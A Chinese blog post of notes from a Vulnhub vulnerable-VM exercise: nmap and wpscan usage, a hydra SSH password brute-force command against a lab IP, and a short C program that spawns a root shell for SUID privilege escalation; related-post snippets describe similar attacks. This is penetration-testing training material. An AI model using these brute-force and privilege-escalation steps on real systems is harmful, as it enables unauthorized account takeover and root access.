vunhub 靶机之旅-1

最新推荐文章于 2024-07-30 21:00:05 发布
最新推荐文章于 2024-07-30 21:00:05 发布
阅读量1k 收藏
点赞数
分类专栏: 安全学习 文章标签: 自我提升
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38063791/article/details/84899794
版权

youtube视频:
https://www.youtube.com/watch?v=SerBliNAh1k

nmap
-A 同时打开操作系统指纹和版本检测

wpscan --url 查找 -e enumerate 列举 --enumerate u列举用户
Examples :

帮助
-Further help …
ruby ./wpscan.rb --help
做“非侵入性”检查
-Do ‘non-intrusive’ checks …
ruby ./wpscan.rb --url www.example.com
使用50个线程对枚举的用户做单词列表密码蛮力…
-Do wordlist password brute force on enumerated users using 50 threads …
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
做单词表密码蛮力上的“管理员”用户名只…
-Do wordlist password brute force on the ‘admin’ username only …
ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
枚举安装的插件…
-Enumerate installed plugins …
ruby ./wpscan.rb --url www.example.com --enumerate p
枚举安装的主题
-Enumerate installed themes …
ruby ./wpscan.rb --url www.example.com --enumerate t
枚举用户
-Enumerate users …
ruby ./wpscan.rb --url www.example.com --enumerate u
枚举安装的TimTrBBS
-Enumerate installed timthumbs …
ruby ./wpscan.rb --url www.example.com --enumerate tt
使用HTTP代理
-Use a HTTP proxy …
ruby ./wpscan.rb --url www.example.com --proxy 127.0.0.1:8118
使用SoCKS5代理
-Use a SOCKS5 proxy … (cURL >= v7.21.7 needed)
ruby ./wpscan.rb --url www.example.com --proxy socks5://127.0.0.1:9000
使用自定义内容目录
-Use custom content directory …
ruby ./wpscan.rb -u www.example.com --wp-content-dir custom-content
使用自定义插件目录
-Use custom plugins directory …
ruby ./wpscan.rb -u www.example.com --wp-plugins-dir wp-content/custom-plugins
更新数据库
-Update the DB …
ruby ./wpscan.rb --update
调试输出
-Debug output …
ruby ./wpscan.rb --url www.example.com --debug-output 2>debug.log

See README for further information.

先去/home 目录 看用户
再去 /etc/ssh 看 sshd_config
得到 可以ssh的用户

ssh id@localhost
hydra 使用方法:https://www.cnblogs.com/ECJTUACM-873284962/p/7805116.html

hydra -l anne -p /usr/share/wordlists/nmap.lst ssh://192.168.247.128
ip + 服务
-s 指定端口
-l 指定用户
-L 指定用户字典
-p 指定密码破解
-P 指定密码字典(文件)

SUID提权 文章:https://www.cnblogs.com/hookjoy/p/6612595.html
#include <stdio.h>
#include <stdlib.h>
int main (void){
seteuid(0);
setegid(0);
system("/bin/bash -p");
return 0;
}
gcc -o hello hello.c

编译后运行,暂时提权
sudo ./hello

:从最开始的FTP 端口的匿名用户进去的,主站是worldpress,进行SSH的爆破 得到密码,查找得到某些用户不能密码登陆。
最后SUID 提权

收获:简单实用nmap,wpscan,ftp命令,hydra 爆破 SUID 提权 /home目录与 /etc/ssh的sshd_config 对比 得确切用户

a_shen_ge
关注
专栏目录
Vuluhub靶场-breach1
ad12456的博客
05-03 1669
网络设置和准备: 该靶场的ip:192.168.110.140 ,我们要设置为仅主机模式。在虚拟机中将仅主机模式的ip地址范围包含靶机的ip。除了网络设置,还要准备两台kali。一台连接外网,一台和靶机一样要仅主机模式。 信息收集 Nmap扫描 启动靶机,启动kali攻击机。现在了解的信息就一个:IP。首先用nmap扫描端口,看看开启了什么服务。 namp -T4 -A -v 192.168.110.140 发现端口大量的开放,推测应该是安装了蜜罐之类的防护。那我们用最常用的服务端口:80 试一试看
vunhub 靶机之旅-2
ashen的博客
12-09 709
YouTube:https://www.youtube.com/watch?v=GVWPVZ0uRpU Jarbas walkthrough | vulnhub Gobuster 子域名/目录暴力工具 -P string:基本AUTH的密码(仅为DIR模式) -U string:基本AUTH的用户名(仅为DIR模式) -a string:设置用户代理字符串(DIR模式) -c string:用于请...
vuluhub
avasy的博客
02-11 1203
Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they're not very security aware ! (IMPORTANT NOTE : The whole challenge is in fren...
Vuluhub靶机 De-ICE: S1.120(渗透测试详细)
最新发布
2301_78721909的博客
07-30 417
Vuluhub靶机 De-ICE: S1.120 (from wuhu)
Vunhub-DC-6
06-11 1097
靶机IP:192.168.20.140网络有问题的可以看下。
Vulunhub Web2靶机练习之lxc
Aiwin的博客
10-04 972
Vulunhub Web2靶机练习
Vulnhub -- jarbas靶机渗透
Gh0st_1n_The_Shell的博客
05-31 868
信息收集 扫描开放的端口 进行目录爆破 尝试攻击 提权 提权--信息收集 目标:拿到服务器的Shell 信息收集 配置好后用nmap扫描 kali's ip:192.168.241.131 nmap -sP 192.168.241.131/24 一个个扫描 发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142 扫描开放的端口 nmap -sV 192.168.241.142 ...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web漏扫-appscan漏扫软件扫描靶机并分析-xss,sql等详细笔记总结
06-30
web漏扫-appscan漏扫软件扫描靶机并分析-xss,sql等详细笔记总结
[vuluhub]-(GoldenEye)
weixin_47920370的博客
08-25 1110
我们在国外漏洞库搜索的时候,发现他要是用PSpellShell,经过仔细寻找,然后我们在Site administration ->Advanced features -> Plugins->Text editors->TinyMCE HTML editor。hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3 --用九头蛇对pop3进行爆破。用邮件里面的用户名和密码进行登陆一下。..
Vluhub 靶场
jieli0901227的博客
10-27 1931
1、什么是Vluhub Vluhub是一个基于docker和docker-compose 的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单 Vluhub 官方地址Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。https://vulhub.org/ 2、靶场搭建 我们使用在kali中进行安装 2.1 docke
vulvhub-----Hacker-KID靶机,2024年最新这是一份面向网络安全开发者的复习指南
2401_83947353的博客
04-14 497
80端口是一个正常的页面,但查看源代码中,看到“ Use a GET parameter page_no to view pages”字样,他的意思是通过GET方法,传入一个page_no的参数9999端口是一个登陆页面,想办法获取账号密码发送到intruder模块,将‘1’添加payload,从1-50开始爆破,爆破后21数值的长度不一样。
带妹玩转Vulnhub【一】
BadRer的博客
09-27 7692
前言 题目是不想在刷了,想学一学渗透测试的知识。 由于是开头之作,所以会写的比较的详细,尽量让大家少走弯路。 带妹是不可能带妹的,这辈子都不可能带妹的
vulvhub-----Hacker-KID靶机
woshicainiao666的博客
02-18 589
bashrc 文件是一个在 Bash shell 启动时自动执行的脚本文件。Bash 是 Linux 和其他 UNIX-like 系统中常用的 shell,而 .bashrc 文件通常位于用户的主目录下(例如,/home/username/ 或 ~),并且通常包含用户的个性化设置和别名等。想要执行成功,需要root进程进行注入,python2.7 exp.py 2185,root进程太多,写一个简单的shell脚本。,是一个注册页面,查看源码,发现是xml格式,猜测是XXE漏洞,抓包验证。
AI Web 1靶机渗透实战-vuluhub系列(一)
PANDA墨森的博客
06-27 1350
这是vulnhub靶机系列文章的第一篇,接下来这段时间会分享曾经做过比较接近实战的靶机,把思路分享给大家... 靶机下载链接:https://www.vulnhub.com/entry/ai-web-1,353/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13172299.html #001 环境搭建(nat) 攻击机kali:192.168.136.129 靶机AI-web-1:192.168.136.142 #002 实战writeup 寻.
vulhub靶场 1-5
weixin_48776804的博客
02-15 710
vulhub靶场漏洞复现
例举使用Nmap工具对靶机Metasploitable2-XP和Metasploitable2-Linux进行端口扫描
05-26
nmap -sS -p 1-65535 192.168.1.102 ``` 该命令将使用TCP SYN扫描模式扫描目标主机的所有端口,并显示开放的端口和对应的服务。 注意:在扫描Linux主机时,需要使用sudo权限来执行该命令。 4. 分析扫描结果,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值